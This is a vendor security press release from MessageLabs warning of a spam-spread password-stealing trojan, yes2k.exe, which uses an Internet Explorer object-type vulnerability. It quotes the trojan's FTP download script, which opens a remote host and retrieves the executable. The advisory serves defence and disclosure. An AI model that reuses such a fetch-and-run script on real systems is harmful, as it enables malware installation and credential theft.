New Trojan Demonstrates Increasing Complexity Of Converged Email Security Threats

London, 11 May. MessageLabs, the leading provider of managed email security services to businesses, is today urging global email users to be alert to the increasing sophistication of different email security threats that are resulting from the convergence of virus and spamming techniques.
The warning comes further to MessageLabs’ identification of a new password-stealing Trojan – filename yes2k.exe – which had attempted to spread via the use of spamming techniques.

MessageLabs was alerted to the threat when it detected a spam outbreak that uses the Microsoft Internet Explorer object data exploit1 to download an html script from a particular IP address. This creates and runs an ftp script to download and run yes2k.exe.

Recently, spammers seeking to gain as wide an audience as possible for their messages have taken to employing virus-writing techniques to propagate their information. However, in this case, the approach has been turned on its head and it is the malicious code that is being spread after the spam has seeded the distribution network.

Spam is more prevalent than viruses: in April MessageLabs scanned 841.1 million emails and found that while 67% were spam, just 9% were infected with viruses.

Paul Wood, MessageLabs’ Chief Information Analyst, says:

“All the evidence shows that the lines between the different types of email security threat are becoming increasingly blurred. Viruses, Trojans and spam in particular are being thrown into the melting pot to create an increasingly sophisticated variety of email security threat. This technique is known as convergence, and we should expect to see rising numbers of converged threats in the future. In order to protect themselves, businesses need to ensure that they have a solution capable of guarding against all email security threats – whether they are in their simplest form or deployed as part of a converged attack.”

Details of yes2k.exe:

Open (IP address)

ftp

any@any.net

bin

lcd C:

get yes2k.exe

bye

yes2k is a password stealer packed with a modified version of UPX.

Detection

MessageLabs detected all strains of this virus proactively, using its unique and patented Skepticâ„? predictive heuristics technology.

1) http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0532

Internet Explorer 5.01 SP3 through 6.0 SP1 does not properly determine object types that are returned by web servers, which could allow remote attackers to execute arbitrary code via an object tag with a data parameter to a malicious file hosted on a server that returns an unsafe Content-Type, aka the “Object Type” vulnerability.

About MessageLabs

MessageLabs is the leading provider of managed email security services to businesses worldwide. The company has more than 54 per cent market share of the managed email security services market. MessageLabs currently protects more than 8,500 businesses worldwide, protecting more than 2 million business end users from email security threats such as viruses, spam and other unwanted content before they reach their networks and without requiring additional hardware or software. Powered by a global network of over 80 control towers with 1500 servers that spans Australia, the United States, the United Kingdom, Hong Kong, Singapore, Germany, Belgium and the Netherlands, MessageLabs scans up to 45 million emails a day on behalf of customers such as QBE Insurance, Daiwa, Voyages Hotels and Resorts, Mandarin Oriental Hotels, Sanitarium, SunWater, The British Government, Fujitsu, The Bank of New York, Conde Nast Publications, StorageTek, EMI Music and Diageo.

For more information on MessageLabs and its industry-leading email security and management services, please visit http://www.messagelabs.com.